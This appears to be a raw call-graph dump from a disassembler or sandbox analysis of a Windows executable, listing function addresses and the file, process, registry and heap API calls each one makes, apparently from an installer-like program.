50238 91759f 50230->50238 50256 917546 50230->50256 50309 92e4a9 50230->50309 50231->50232 50233 9176e7 50232->50233 50234 9176da CloseHandle 50232->50234 50235 9176fb 50233->50235 50236 9176ef CloseHandle 50233->50236 50234->50233 50239 917700 CloseHandle 50235->50239 50240 91770c 50235->50240 50236->50235 50238->50256 50316 93347d 50238->50316 50239->50240 50242 917710 CloseHandle 50240->50242 50243 917717 50240->50243 50242->50243 50362 913886 50243->50362 50244 9175e8 50244->50256 50348 912b11 50244->50348 50248 913886 5 API calls 50250 917727 50248->50250 50252 917735 50250->50252 50367 91367f GetProcessHeap RtlFreeHeap GetLastError 50250->50367 50255 917743 50252->50255 50368 91367f GetProcessHeap RtlFreeHeap GetLastError 50252->50368 50253 917659 50253->50256 50356 96bf20 50253->50356 50256->50229 50261 92a5e0 50259->50261 50369 929fd1 50261->50369 50263 92a700 50267 92a7f7 50263->50267 50268 92a660 50263->50268 50282 92a738 50263->50282 50264 912eaf 52 API calls 50265 92a634 50264->50265 50265->50263 50266 92a6a5 50265->50266 50265->50268 50415 96b350 73 API calls 50265->50415 50266->50263 50275 912eaf 52 API calls 50266->50275 50270 92a80f 50267->50270 50378 91a7ad 50267->50378 50272 92a99c 50268->50272 50421 91367f GetProcessHeap RtlFreeHeap GetLastError 50268->50421 50271 92a8c1 50270->50271 50284 92a827 50270->50284 50420 96ac92 6 API calls 50271->50420 50278 913886 5 API calls 50272->50278 50274 92a744 Sleep 50274->50282 50280 92a6cd 50275->50280 50281 917540 50278->50281 50279 96b0e2 127 API calls 50279->50282 50280->50263 50280->50268 50286 912eaf 52 API calls 50280->50286 50281->50228 50281->50256 50282->50274 50282->50279 50285 92a785 50282->50285 50283 92a896 50419 92a07c 73 API calls 50283->50419 50284->50283 50288 92a83b 50284->50288 50289 92a78c 50285->50289 50296 92a7ec 50285->50296 50286->50263 50291 914601 52 API calls 50288->50291 50416 96ac92 6 API calls 50289->50416 50290 92a847 50290->50268 50290->50296 50381 96b0e2 EnterCriticalSection 50290->50381 50291->50290 50294 92a791 50299 92a79c 50294->50299 50417 93d2ec 56 API calls 50294->50417 50295 92a92a 50297 912eaf 52 API calls 50295->50297 50306 92a955 50295->50306 50296->50268 50296->50295 50301 912eaf 52 API calls 50296->50301 50297->50306 50299->50296 50305 92a7c3 50299->50305 50300 92a88b 50418 96ac92 6 API calls 50300->50418 50304 92a8fd 50301->50304 50307 912eaf 52 API calls 50304->50307 50305->50268 50306->50268 50308 91b89c 80 API calls 50306->50308 50307->50295 50308->50268 50310 914456 60 API calls 50309->50310 50311 92e4bd 50310->50311 50314 92e4c3 50311->50314 50535 92cc1b 50311->50535 50313 92e529 50313->50238 50314->50313 50554 91367f GetProcessHeap RtlFreeHeap GetLastError 50314->50554 50317 912acf 56 API calls 50316->50317 50318 9334a2 50317->50318 50322 9334ab 50318->50322 50616 932ad9 GetCurrentProcess GetCurrentProcess DuplicateHandle 50318->50616 50322->50244 50325 9335a3 50325->50322 50634 931c8a 52 API calls 50325->50634 50326 933539 50326->50322 50326->50325 50632 9129f3 56 API calls 50326->50632 50329 9335cf 50329->50322 50331 933623 50329->50331 50332 9335f4 50329->50332 50330 93357a 50330->50322 50633 91146c 52 API calls 50330->50633 50636 9129dc 52 API calls 50331->50636 50335 933606 50332->50335 50635 9129dc 52 API calls 50332->50635 50335->50322 50337 933660 50335->50337 50637 9129dc 52 API calls 50335->50637 50337->50322 50339 9336b6 50337->50339 50638 9129dc 52 API calls 50337->50638 50339->50322 50340 9336fd 50339->50340 50640 9129f3 56 API calls 50339->50640 50340->50322 50343 933733 50340->50343 50641 9129f3 56 API calls 50340->50641 50343->50322 50642 931d8a 56 API calls 50343->50642 50344 933690 50344->50322 50639 91146c 52 API calls 50344->50639 50646 912afa 50348->50646 50351 9337dc 50352 9337f5 _memcpy_s 50351->50352 50353 933844 CreateProcessW 50352->50353 50354 93384a GetLastError 50353->50354 50355 933856 50353->50355 50354->50355 50355->50253 50357 91174a 2 API calls 50356->50357 50358 96bf2f 50357->50358 50359 96bf66 GetExitCodeProcess 50358->50359 50361 96bf42 50358->50361 50360 96bf76 GetLastError 50359->50360 50359->50361 50360->50361 50361->50256 50649 9138a9 50362->50649 50364 913892 50365 9138a2 50364->50365 50653 91367f GetProcessHeap RtlFreeHeap GetLastError 50364->50653 50365->50248 50367->50252 50368->50255 50370 96cba8 RegOpenKeyExW 50369->50370 50371 929ff7 50370->50371 50377 92a00c 50371->50377 50422 96cd94 58 API calls 50371->50422 50373 92a069 50375 92a078 50373->50375 50376 92a06f RegCloseKey 50373->50376 50375->50264 50375->50265 50376->50375 50377->50373 50423 91367f GetProcessHeap RtlFreeHeap GetLastError 50377->50423 50424 9183d7 EnterCriticalSection 50378->50424 50380 91a7c5 50380->50270 50382 96b104 50381->50382 50383 96b13d 50381->50383 50382->50383 50384 96b109 50382->50384 50385 913db5 52 API calls 50383->50385 50478 913ec2 50384->50478 50390 96b14c 50385->50390 50387 96b122 50388 96b295 50387->50388 50389 96b29a 50387->50389 50391 96b12c 50387->50391 50526 96af11 90 API calls _ValidateLocalCookies 50388->50526 50393 96b2b8 50389->50393 50395 96b3f2 10 API calls 50389->50395 50390->50391 50397 96b17e 50390->50397 50512 91417b 60 API calls 50390->50512 50394 96b2f4 LeaveCriticalSection 50391->50394 50393->50394 50398 912eaf 52 API calls 50393->50398 50400 96b305 50394->50400 50401 96b30d 50394->50401 50402 96b2a9 50395->50402 50397->50391 50399 914601 52 API calls 50397->50399 50398->50391 50403 96b1b1 50399->50403 50528 91367f GetProcessHeap RtlFreeHeap GetLastError 50400->50528 50405 92a885 50401->50405 50529 91367f GetProcessHeap RtlFreeHeap GetLastError 50401->50529 50402->50393 50527 91367f GetProcessHeap RtlFreeHeap GetLastError 50402->50527 50403->50391 50513 916305 CreateDirectoryW 50403->50513 50405->50296 50405->50300 50409 96b1d4 50409->50391 50410 96b1fe CreateFileW 50409->50410 50411 96b234 GetLastError 50410->50411 50412 96b240 50410->50412 50411->50412 50412->50387 50413 96b27f SetFilePointer 50412->50413 50414 96b24d 50412->50414 50413->50387 50414->50391 50415->50266 50416->50294 50417->50299 50418->50299 50419->50290 50420->50296 50421->50272 50422->50377 50423->50373 50425 918417 50424->50425 50426 9129c8 52 API calls 50425->50426 50462 918420 50425->50462 50457 918452 50426->50457 50427 918a0e LeaveCriticalSection 50428 918a57 50427->50428 50438 918a1e 50427->50438 50433 918a88 50428->50433 50434 918a6a 50428->50434 50429 918682 50471 91b957 52 API calls 50429->50471 50430 918a4b 50432 9155c9 3 API calls 50430->50432 50432->50428 50435 913886 5 API calls 50433->50435 50436 918a78 50434->50436 50476 91367f GetProcessHeap RtlFreeHeap GetLastError 50434->50476 50441 918a90 50435->50441 50439 918a86 50436->50439 50477 91367f GetProcessHeap RtlFreeHeap GetLastError 50436->50477 50438->50430 50440 913886 5 API calls 50438->50440 50475 91367f GetProcessHeap RtlFreeHeap GetLastError 50438->50475 50439->50380 50440->50438 50447 913886 5 API calls 50441->50447 50442 9186a5 50442->50380 50443 9187a4 50472 91b957 52 API calls 50443->50472 50448 918a98 50447->50448 50450 913886 5 API calls 50448->50450 50449 91b957 52 API calls 50449->50457 50450->50439 50451 91b99a 52 API calls 50451->50457 50456 918698 50456->50442 50456->50462 50473 91b938 52 API calls 50456->50473 50457->50429 50457->50443 50457->50449 50457->50451 50460 912eaf 52 API calls 50457->50460 50457->50462 50465 9156c2 GetProcessHeap RtlReAllocateHeap 50457->50465 50466 91540b GetProcessHeap RtlAllocateHeap 50457->50466 50467 91b4f2 CompareStringW GetLastError EnterCriticalSection LeaveCriticalSection 50457->50467 50468 918b6f 64 API calls 50457->50468 50469 913089 52 API calls 50457->50469 50470 91b979 56 API calls 50457->50470 50460->50457 50462->50427 50464 918963 50474 91b99a 52 API calls 50464->50474 50465->50457 50466->50457 50467->50457 50468->50457 50469->50457 50470->50457 50471->50456 50472->50456 50473->50464 50474->50462 50475->50438 50476->50436 50477->50439 50479 913f14 50478->50479 50480 913f4d 50478->50480 50479->50480 50482 913f19 50479->50482 50481 914dd8 70 API calls 50480->50481 50483 913f57 50481->50483 50484 913dce 52 API calls 50482->50484 50486 913dce 52 API calls 50483->50486 50497 913f2c 50483->50497 50485 913f26 50484->50485 50487 914601 52 API calls 50485->50487 50485->50497 50486->50485 50488 913fa2 50487->50488 50490 916305 5 API calls 50488->50490 50494 913faf 50488->50494 50489 91413e 50493 91414c 50489->50493 50531 91367f GetProcessHeap RtlFreeHeap GetLastError 50489->50531 50490->50494 50491 913feb GetLocalTime 50491->50494 50496 91415a 50493->50496 50532 91367f GetProcessHeap RtlFreeHeap GetLastError 50493->50532 50494->50491 50494->50497 50498 912acf 56 API calls 50494->50498 50504 91404f CreateFileW 50494->50504 50505 9140ba 50494->50505 50507 9140e3 50494->50507 50508 914083 Sleep 50494->50508 50500 914168 50496->50500 50533 91367f GetProcessHeap RtlFreeHeap GetLastError 50496->50533 50497->50489 50530 91367f GetProcessHeap RtlFreeHeap GetLastError 50497->50530 50498->50494 50501 9567e6 _ValidateLocalCookies 5 API calls 50500->50501 50503 914177 50501->50503 50503->50387 50504->50505 50506 914071 GetLastError 50504->50506 50505->50507 50509 912eaf 52 API calls 50505->50509 50506->50494 50506->50508 50507->50497 50511 914129 CloseHandle 50507->50511 50508->50494 50510 914093 50508->50510 50509->50507 50510->50494 50511->50497 50512->50397 50514 916321 GetLastError 50513->50514 50522 91632e 50513->50522 50515 916335 50514->50515 50514->50522 50516 91633a 50515->50516 50519 916346 50515->50519 50534 916414 GetFileAttributesW 50516->50534 50518 916342 50518->50519 50518->50522 50520 916305 GetFileAttributesW 50519->50520 50519->50522 50521 916385 50520->50521 50521->50522 50523 9163ad CreateDirectoryW 50521->50523 50522->50409 50524 9163bb GetLastError 50523->50524 50525 9163cb 50523->50525 50524->50525 50525->50522 50526->50389 50527->50393 50528->50401 50529->50405 50530->50489 50531->50493 50532->50496 50533->50500 50534->50518 50555 92ed3b 50535->50555 50538 972127 73 API calls 50539 92cc66 50538->50539 50540 916305 5 API calls 50539->50540 50553 92cc40 50539->50553 50541 92cc8c 50540->50541 50546 972127 73 API calls 50541->50546 50541->50553 50543 92cd60 50545 92cd6d 50543->50545 50597 91367f GetProcessHeap RtlFreeHeap GetLastError 50543->50597 50544 92cd53 50544->50543 50596 91367f GetProcessHeap RtlFreeHeap GetLastError 50544->50596 50545->50314 50549 92ccb8 50546->50549 50549->50553 50567 92cd75 CreateFileW 50549->50567 50552 912eaf 52 API calls 50552->50553 50553->50544 50595 91367f GetProcessHeap RtlFreeHeap GetLastError 50553->50595 50554->50313 50556 92ede9 DecryptFileW 50555->50556 50565 92ed56 50555->50565 50557 92edb7 50556->50557 50558 92edfd 50556->50558 50559 92cc3a 50557->50559 50599 91367f GetProcessHeap RtlFreeHeap GetLastError 50557->50599 50561 912eaf 52 API calls 50558->50561 50559->50538 50559->50553 50560 972127 73 API calls 50560->50565 50561->50557 50564 916305 5 API calls 50564->50565 50565->50560 50565->50564 50566 92eda1 50565->50566 50598 96acf6 72 API calls _ValidateLocalCookies 50565->50598 50566->50556 50566->50557 50568 92ce17 50567->50568 50569 92cdc8 GetLastError 50567->50569 50600 9739dd SetFilePointerEx 50568->50600 50575 92cdd4 50569->50575 50571 92ce21 50572 92ce27 50571->50572 50603 972b2e 50571->50603 50576 92d04d CloseHandle 50572->50576 50578 9567e6 _ValidateLocalCookies 5 API calls 50575->50578 50576->50575 50577 92ce9a SetFilePointerEx 50579 92cef2 50577->50579 50580 92ceab GetLastError 50577->50580 50581 92cce3 50578->50581 50611 973f70 50579->50611 50580->50572 50581->50552 50581->50553 50583 92cefe 50583->50572 50584 92cf1b SetFilePointerEx 50583->50584 50585 92cf74 50584->50585 50586 92cf2e GetLastError 50584->50586 50587 973f70 2 API calls 50585->50587 50586->50572 50588 92cf80 50587->50588 50588->50572 50589 973f70 2 API calls 50588->50589 50590 92cfa9 50589->50590 50590->50572 50591 92cfc3 SetFilePointerEx 50590->50591 50592 92cfd6 GetLastError 50591->50592 50593 92cfe2 50591->50593 50592->50593 50594 973f70 2 API calls 50593->50594 50594->50572 50595->50544 50596->50543 50597->50545 50598->50565 50599->50559 50601 9739ff GetLastError 50600->50601 50602 973a0b 50600->50602 50601->50602 50602->50571 50607 972b3b ___scrt_uninitialize_crt 50603->50607 50604 972ba7 ReadFile 50605 972c39 GetLastError 50604->50605 50604->50607 50610 972c12 50605->50610 50606 973f70 2 API calls 50606->50607 50607->50604 50607->50606 50607->50610 50608 9567e6 _ValidateLocalCookies 5 API calls 50609 92ce5f 50608->50609 50609->50572 50609->50576 50609->50577 50610->50608 50612 973f85 WriteFile 50611->50612 50615 973fc0 50611->50615 50613 973f9f GetLastError 50612->50613 50614 973fab 50612->50614 50613->50614 50614->50612 50614->50615 50615->50583 50617 932b0e GetLastError 50616->50617 50618 932b5c 50616->50618 50620 932b1a 50617->50620 50643 912a55 56 API calls 50618->50643 50621 932bb5 50620->50621 50622 932bae CloseHandle 50620->50622 50621->50322 50623 932bbd CreateFileW 50621->50623 50622->50621 50624 932c02 50623->50624 50625 932c86 50623->50625 50644 912a55 56 API calls 50624->50644 50625->50322 50631 932c8f 56 API calls 50625->50631 50627 932c15 50629 932c1e 50627->50629 50645 9129f3 56 API calls 50627->50645 50629->50625 50630 932c7f CloseHandle 50629->50630 50630->50625 50631->50326 50632->50330 50633->50325 50634->50329 50635->50335 50636->50335 50637->50337 50638->50344 50639->50339 50640->50340 50641->50343 50642->50322 50643->50620 50644->50627 50645->50629 50647 911ae9 56 API calls 50646->50647 50648 912b0d 50647->50648 50648->50256 50648->50351 50650 9138bb 50649->50650 50652 9138c5 50649->50652 50654 91593a GetProcessHeap HeapSize 50650->50654 50652->50364 50653->50365 50654->50652 50708 918e10 6 API calls 50709 93d010 19 API calls 50710 94e210 55 API calls 50711 961e10 GetCommandLineA GetCommandLineW 50713 919000 72 API calls 48486 956a07 48495 957100 GetModuleHandleW 48486->48495 48488 956a0f 48489 956a45 48488->48489 48491 956a13 48488->48491 48497 95e73d 21 API calls CallUnexpected 48489->48497 48490 956a1e 48491->48490 48496 95e71f 21 API calls CallUnexpected 48491->48496 48494 956a4d 48495->48488 48496->48490 48497->48494 50714 956800 49 API calls __RTC_Initialize 50715 963000 GetProcessHeap 50717 92940e 84 API calls 50718 919430 9 API calls 49628 93de30 49629 93de52 49628->49629 49633 93de5c 49628->49633 49630 93de57 49629->49630 49631 93de6c 49629->49631 49632 93de61 49630->49632 49630->49633 49637 93e386 SetEvent 49631->49637 49668 93e2b8 DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime CloseHandle 49632->49668 49636 93de6a 49636->49633 49638 93e3e5 49637->49638 49639 93e39f GetLastError 49637->49639 49640 91174a 2 API calls 49638->49640 49645 93e3ab 49639->49645 49641 93e3ef 49640->49641 49642 93e419 ResetEvent 49641->49642 49641->49645 49643 93e426 GetLastError 49642->49643 49644 93e46c 49642->49644 49643->49645 49644->49645 49646 912ec6 10 API calls 49644->49646 49645->49633 49647 93e4c7 49646->49647 49647->49645 49648 93e4f4 SetEvent 49647->49648 49649 93e501 GetLastError 49648->49649 49650 93e547 49648->49650 49649->49645 49651 91174a 2 API calls 49650->49651 49652 93e551 49651->49652 49652->49645 49653 93e573 ResetEvent 49652->49653 49654 93e580 GetLastError 49653->49654 49655 93e5c6 49653->49655 49654->49645 49656 93e5d3 49655->49656 49657 93e66d CreateFileW 49655->49657 49656->49645 49669 91540b GetProcessHeap RtlAllocateHeap 49656->49669 49658 93e692 GetLastError 49657->49658 49659 93e6dc SetFilePointerEx 49657->49659 49666 93e69e 49658->49666 49660 93e6f0 GetLastError 49659->49660 49661 93e736 SetEndOfFile 49659->49661 49667 93e6fc 49660->49667 49663 93e743 GetLastError 49661->49663 49664 93e786 SetFilePointerEx 49661->49664 49663->49667 49664->49645 49665 93e797 GetLastError 49664->49665 49665->49667 49666->49659 49667->49645 49668->49636 49669->49645 49734 97c43d 49735 97c41c 49734->49735 49736 97c6ef ___delayLoadHelper2@8 16 API calls 49735->49736 49736->49735 50719 929839 96 API calls _ValidateLocalCookies 50720 92e622 64 API calls 50721 919c20 79 API calls 2 library calls 50218 93de20 50219 9155c9 3 API calls 50218->50219 50220 93de2b 50219->50220 50723 916a25 90 API calls 50724 922c2a LoadLibraryExW GetLastError GetProcAddress GetLastError 50729 956a50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 50730 93fa55 77 API calls 50732 95de5b 42 API calls 2 library calls 50734 916c2a 8 API calls 49670 917e72 49672 917e78 49670->49672 49671 917ee0 49674 917ef2 49671->49674 49713 92a9ad 131 API calls 49671->49713 49672->49671 49712 91367f GetProcessHeap RtlFreeHeap GetLastError 49672->49712 49675 9256b4 94 API calls 49674->49675 49677 917efe 49675->49677 49678 92fbe8 94 API calls 49677->49678 49679 917f0a 49678->49679 49680 92fdf6 3 API calls 49679->49680 49681 917f16 49680->49681 49682 917f42 49681->49682 49683 918119 72 API calls 49681->49683 49684 918119 72 API calls 49682->49684 49683->49682 49685 917f80 49684->49685 49686 96ae56 4 API calls 49685->49686 49687 917fc4 49686->49687 49688 92c13d 54 API calls 49687->49688 49689 917ff0 49688->49689 49690 93d6fd 2 API calls 49689->49690 49691 91803c 49690->49691 49692 936157 2 API calls 49691->49692 49693 918050 49692->49693 49694 91774c 19 API calls 49693->49694 49695 9180b3 49694->49695 49696 9180c1 49695->49696 49714 970d9c CoUninitialize 49695->49714 49698 9180cf 49696->49698 49715 96fbc7 FreeLibrary 49696->49715 49700 9180dd 49698->49700 49716 96d520 FreeLibrary 49698->49716 49702 9180f0 49700->49702 49717 9710aa FreeLibrary FreeLibrary 49700->49717 49704 9180f4 CoUninitialize 49702->49704 49705 9180fa 49702->49705 49704->49705 49708 96b41c 78 API calls 49705->49708 49706 9180eb 49718 96a6e3 FreeLibrary FreeLibrary 49706->49718 49709 918106 49708->49709 49710 9567e6 _ValidateLocalCookies 5 API calls 49709->49710 49711 918115 49710->49711 49712->49671 49713->49674 49714->49696 49715->49698 49716->49700 49717->49706 49718->49702 50738 962070 7 API calls 50739 960670 75 API calls 2 library calls 50740 967e70 IsProcessorFeaturePresent 50743 918e60 87 API calls 50745 953604 119 API calls 50747 935e6e 95 API calls 48372 917d90 298 API calls _ValidateLocalCookies 50753 916999 EnterCriticalSection LeaveCriticalSection 48479 97c19c 48480 97c17b 48479->48480 48480->48479 48481 97c6ef ___delayLoadHelper2@8 16 API calls 48480->48481 48481->48480 50755 925180 5 API calls _ValidateLocalCookies 48513 917b87 48514 917b90 48513->48514 48515 917ba6 48513->48515 48702 93d137 15 API calls 48514->48702 48518 917bb1 CoInitializeEx 48515->48518 48517 917ba4 48517->48515 48519 917b31 48518->48519 48520 917ee0 48519->48520 48703 91367f GetProcessHeap RtlFreeHeap GetLastError 48519->48703 48522 917ef2 48520->48522 48704 92a9ad 131 API calls 48520->48704 48560 9256b4 48522->48560 48529 917f16 48530 917f42 48529->48530 48531 918119 72 API calls 48529->48531 48584 918119 48530->48584 48531->48530 48535 917fc4 48592 92c13d 48535->48592 48541 918050 48612 91774c 48541->48612 48543 9180b3 48544 9180c1 48543->48544 48705 970d9c CoUninitialize 48543->48705 48546 9180cf 48544->48546 48706 96fbc7 FreeLibrary 48544->48706 48548 9180dd 48546->48548 48707 96d520 FreeLibrary 48546->48707 48550 9180f0 48548->48550 48708 9710aa FreeLibrary FreeLibrary 48548->48708 48552 9180f4 CoUninitialize 48550->48552 48553 9180fa 48550->48553 48552->48553 48691 96b41c 48553->48691 48554 9180eb 48709 96a6e3 FreeLibrary FreeLibrary 48554->48709 48559 918115 48561 9256c1 48560->48561 48562 917efe 48560->48562 48717 915c81 48561->48717 48564 92fbe8 48562->48564 48565 917f0a 48564->48565 48566 92fbf8 48564->48566 48568 92fdf6 48565->48568 48567 915c81 94 API calls 48566->48567 48567->48565 48569 92fe03 48568->48569 48570 92fe0e 48568->48570 48896 913605 GetProcessHeap RtlFreeHeap GetLastError 48569->48896 48572 92fe1c 48570->48572 48897 91367f GetProcessHeap RtlFreeHeap GetLastError 48570->48897 48573 92fe2a 48572->48573 48898 91367f GetProcessHeap RtlFreeHeap GetLastError 48572->48898 48576 92fe38 48573->48576 48899 91367f GetProcessHeap RtlFreeHeap GetLastError 48573->48899 48579 92fe48 48576->48579 48900 91367f GetProcessHeap RtlFreeHeap GetLastError 48576->48900 48580 92fe58 48579->48580 48901 91367f GetProcessHeap RtlFreeHeap GetLastError 48579->48901 48582 92fe68 _memcpy_s 48580->48582 48902 91367f GetProcessHeap RtlFreeHeap GetLastError 48580->48902 48582->48529 48903 96b07f 48584->48903 48587 96ae56 EnterCriticalSection 48588 96ae71 FlushFileBuffers 48587->48588 48591 96ae6e 48587->48591 48589 96aec4 LeaveCriticalSection 48588->48589 48590 96ae7c GetLastError 48588->48590 48589->48535 48590->48591 48591->48589 48966 96a051 48592->48966 48594 92c15b 48595 96a051 6 API calls 48594->48595 48604 92c161 48594->48604 48596 92c195 48595->48596 48597 92c1ce 48596->48597 48596->48604 48969 92b637 48 API calls 48596->48969 48597->48604 48970 92b637 48 API calls 48597->48970 48599 917ff0 48605 93d6fd IsWindow 48599->48605 48602 92c1f7 48602->48604 48971 91174a WaitForSingleObject 48602->48971 48604->48599 48975 9155c9 GetProcessHeap RtlFreeHeap 48604->48975 48606 91803c 48605->48606 48607 93d714 PostMessageW 48605->48607 48608 936157 48606->48608 48607->48606 48609 936163 48608->48609 48611 936170 48608->48611 48610 91174a 2 API calls 48609->48610 48610->48611 48611->48541 48613 917764 48612->48613 48614 91775e 48612->48614 48616 917774 48613->48616 48617 9155c9 3 API calls 48613->48617 49158 969966 LocalFree 48614->49158 48618 917784 48616->48618 48619 9155c9 3 API calls 48616->48619 48617->48616 48620 917791 CloseHandle 48618->48620 48621 91779e 48618->48621 48619->48618 48620->48621 48622 9177b5 DeleteCriticalSection 48621->48622 48623 9177a8 CloseHandle 48621->48623 48624 9177db 48622->48624 48625 9177ce CloseHandle 48622->48625 48623->48622 48626 9177f2 48624->48626 48627 9177e5 CloseHandle 48624->48627 48625->48624 48989 92b9e9 48626->48989 48627->48626 48629 9177fe 48630 92b9e9 7 API calls 48629->48630 48631 91780a 48630->48631 48632 91781a 48631->48632 49159 91367f GetProcessHeap RtlFreeHeap GetLastError 48631->49159 48634 917831 48632->48634 48635 917824 CloseHandle 48632->48635 49002 92058b 48634->49002 48635->48634 48639 917856 49014 91e956 48639->49014 48645 91787a 49029 91c06f DeleteCriticalSection 48645->49029 48651 91789e 49120 92003c 48651->49120 48657 9178bf 49150 91f3f2 48657->49150 48660 9178d8 48662 9178e5 48660->48662 49161 91367f GetProcessHeap RtlFreeHeap GetLastError 48660->49161 48664 9178f2 48662->48664 49162 91367f GetProcessHeap RtlFreeHeap GetLastError 48662->49162 48666 9178ff 48664->48666 49163 91367f GetProcessHeap RtlFreeHeap GetLastError 48664->49163 48669 91790f 48666->48669 49164 91367f GetProcessHeap RtlFreeHeap GetLastError 48666->49164 48670 91791f 48669->48670 49165 91367f GetProcessHeap RtlFreeHeap GetLastError 48669->49165 48672 91792f 48670->48672 49166 91367f GetProcessHeap RtlFreeHeap GetLastError 48670->49166 48674 91793f 48672->48674 49167 91367f GetProcessHeap RtlFreeHeap GetLastError 48672->49167 48676 91794f 48674->48676 49168 91367f GetProcessHeap RtlFreeHeap GetLastError 48674->49168 48678 91795f 48676->48678 49169 91367f GetProcessHeap RtlFreeHeap GetLastError 48676->49169 48680 91796f 48678->48680 49170 91367f GetProcessHeap RtlFreeHeap GetLastError 48678->49170 48682 91797f 48680->48682 49171 91367f GetProcessHeap RtlFreeHeap GetLastError 48680->49171 48684 91798f 48682->48684 49172 91367f GetProcessHeap RtlFreeHeap GetLastError 48682->49172 48686 91799f 48684->48686 49173 91367f GetProcessHeap RtlFreeHeap GetLastError 48684->49173 48688 9179af DeleteCriticalSection 48686->48688 49174 91367f GetProcessHeap RtlFreeHeap GetLastError 48686->49174 48689 9179c8 _memcpy_s 48688->48689 48689->48543 49304 96ac32 48691->49304 48694 96b432 DeleteCriticalSection 48695 96b443 48694->48695 48696 96b45e 48695->48696 49314 91367f GetProcessHeap RtlFreeHeap GetLastError 48695->49314 48698 96b473 48696->48698 49315 91367f GetProcessHeap RtlFreeHeap GetLastError 48696->49315 48700 918106 48698->48700 49316 91367f GetProcessHeap RtlFreeHeap GetLastError 48698->49316 48710 9567e6 48700->48710 48702->48517 48703->48520 48704->48522 48705->48544 48706->48546 48707->48548 48708->48554 48709->48550 48711 9567ef IsProcessorFeaturePresent 48710->48711 48712 9567ee 48710->48712 48714 956b55 48711->48714 48712->48559 49320 956b18 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48714->49320 48716 956c38 48716->48559 48718 915cbb _memcpy_s 48717->48718 48719 915cd9 GetFileAttributesW 48718->48719 48720 915d61 48719->48720 48721 915cf4 GetLastError 48719->48721 48722 915dda 48720->48722 48723 915d6d SetFileAttributesW 48720->48723 48749 9160d8 48720->48749 48733 915d00 48721->48733 48725 91615c RemoveDirectoryW 48722->48725 48726 915e01 48722->48726 48771 914dd8 48722->48771 48723->48722 48724 915d7d GetLastError 48723->48724 48734 915d89 48724->48734 48728 91616d GetLastError 48725->48728 48725->48749 48726->48733 48763 913db5 48726->48763 48730 916179 48728->48730 48739 916190 MoveFileExW 48730->48739 48730->48749 48732 9162af FindClose 48732->48733 48736 9162ca 48733->48736 48786 91367f GetProcessHeap RtlFreeHeap GetLastError 48733->48786 48734->48733 48738 9162de 48736->48738 48787 91367f GetProcessHeap RtlFreeHeap GetLastError 48736->48787 48742 9162f2 48738->48742 48788 91367f GetProcessHeap RtlFreeHeap GetLastError 48738->48788 48739->48749 48740 915e78 GetLastError 48762 915e84 48740->48762 48744 9567e6 _ValidateLocalCookies 5 API calls 48742->48744 48746 916301 48744->48746 48745 9160b7 FindNextFileW 48747 91614d GetLastError 48745->48747 48745->48762 48746->48562 48747->48725 48748 9161fd GetLastError 48747->48748 48748->48749 48749->48732 48749->48733 48750 913db5 52 API calls 48750->48762 48752 91600b DeleteFileW 48752->48762 48753 915fba SetFileAttributesW 48753->48752 48754 915fcf GetLastError 48753->48754 48760 915fdb 48754->48760 48755 91607a GetLastError 48755->48762 48757 915c81 75 API calls 48757->48762 48758 916048 MoveFileExW 48758->48760 48759 9160f2 48759->48749 48760->48758 48760->48759 48761 91606a MoveFileExW 48760->48761 48760->48762 48785 914b8a 61 API calls 48760->48785 48761->48762 48762->48745 48762->48749 48762->48750 48762->48752 48762->48753 48762->48755 48762->48757 48762->48760 48766 913cfd 48762->48766 48789 913dce 48763->48789 48765 913dca FindFirstFileW 48765->48740 48765->48762 48767 9137f3 2 API calls 48766->48767 48769 913d1a 48767->48769 48768 913d20 48768->48762 48769->48768 48831 9129dc 52 API calls 48769->48831 48772 914df2 48771->48772 48773 914e46 48771->48773 48775 9137f3 2 API calls 48772->48775 48840 9129c8 48773->48840 48776 914dfc 48775->48776 48780 914e02 48776->48780 48832 911839 48776->48832 48778 914e2f 48779 914e6c GetProcAddress 48778->48779 48778->48780 48781 914e83 48779->48781 48780->48726 48782 914f0c GetLastError 48781->48782 48783 9129c8 52 API calls 48781->48783 48784 914ec7 48781->48784 48782->48784 48783->48781 48784->48780 48785->48760 48786->48736 48787->48738 48788->48742 48790 913e8a 48789->48790 48791 913dde 48789->48791 48792 912eaf 52 API calls 48790->48792 48791->48790 48793 913de9 48791->48793 48796 913e11 48792->48796 48794 913e67 48793->48794 48797 913dff 48793->48797 48795 912eaf 52 API calls 48794->48795 48795->48796 48796->48765 48803 912eaf 48797->48803 48800 913cfd 52 API calls 48801 913e2d 48800->48801 48801->48796 48806 9129dc 52 API calls 48801->48806 48807 911d40 48803->48807 48805 912ec2 48805->48796 48805->48800 48806->48796 48808 911d53 48807->48808 48810 911d5e 48807->48810 48813 9137f3 48808->48813 48811 911d64 48810->48811 48817 911c76 48810->48817 48811->48805 48814 9137ff 48813->48814 48816 91380b 48813->48816 48827 91593a GetProcessHeap HeapSize 48814->48827 48816->48810 48818 911cae 48817->48818 48826 911c88 48817->48826 48819 911d01 48818->48819 48820 911cb9 48818->48820 48830 91540b GetProcessHeap RtlAllocateHeap 48819->48830 48821 911cc0 48820->48821 48822 911cf6 48820->48822 48828 915810 50 API calls _memcpy_s 48821->48828 48829 9156c2 GetProcessHeap RtlReAllocateHeap 48822->48829 48826->48811 48827->48816 48828->48826 48829->48826 48830->48826 48831->48768 48843 9113da 48832->48843 48834 911844 48835 9118ab 48834->48835 48836 91184c LoadLibraryExW 48834->48836 48849 9118c0 48835->48849 48838 911866 GetLastError 48836->48838 48839 911872 48836->48839 48838->48839 48839->48778 48841 911c76 52 API calls 48840->48841 48842 9129d8 48841->48842 48842->48776 48844 9113e7 GetModuleHandleW 48843->48844 48845 91146b 48843->48845 48846 9113f9 GetLastError 48844->48846 48847 91143e GetProcAddress GetProcAddress 48844->48847 48845->48834 48848 911405 48846->48848 48847->48845 48848->48834 48859 9148c2 48849->48859 48851 9118d8 48855 9118de 48851->48855 48875 912acf 48851->48875 48854 911937 LoadLibraryExW 48854->48855 48857 91194c GetLastError 48854->48857 48856 9119a7 48855->48856 48878 91367f GetProcessHeap RtlFreeHeap GetLastError 48855->48878 48856->48839 48857->48855 48860 914951 48859->48860 48861 9148d6 48859->48861 48862 9129c8 52 API calls 48860->48862 48863 9137f3 2 API calls 48861->48863 48864 9148e1 48862->48864 48863->48864 48865 914901 GetSystemDirectoryW 48864->48865 48868 9148e7 48864->48868 48866 914910 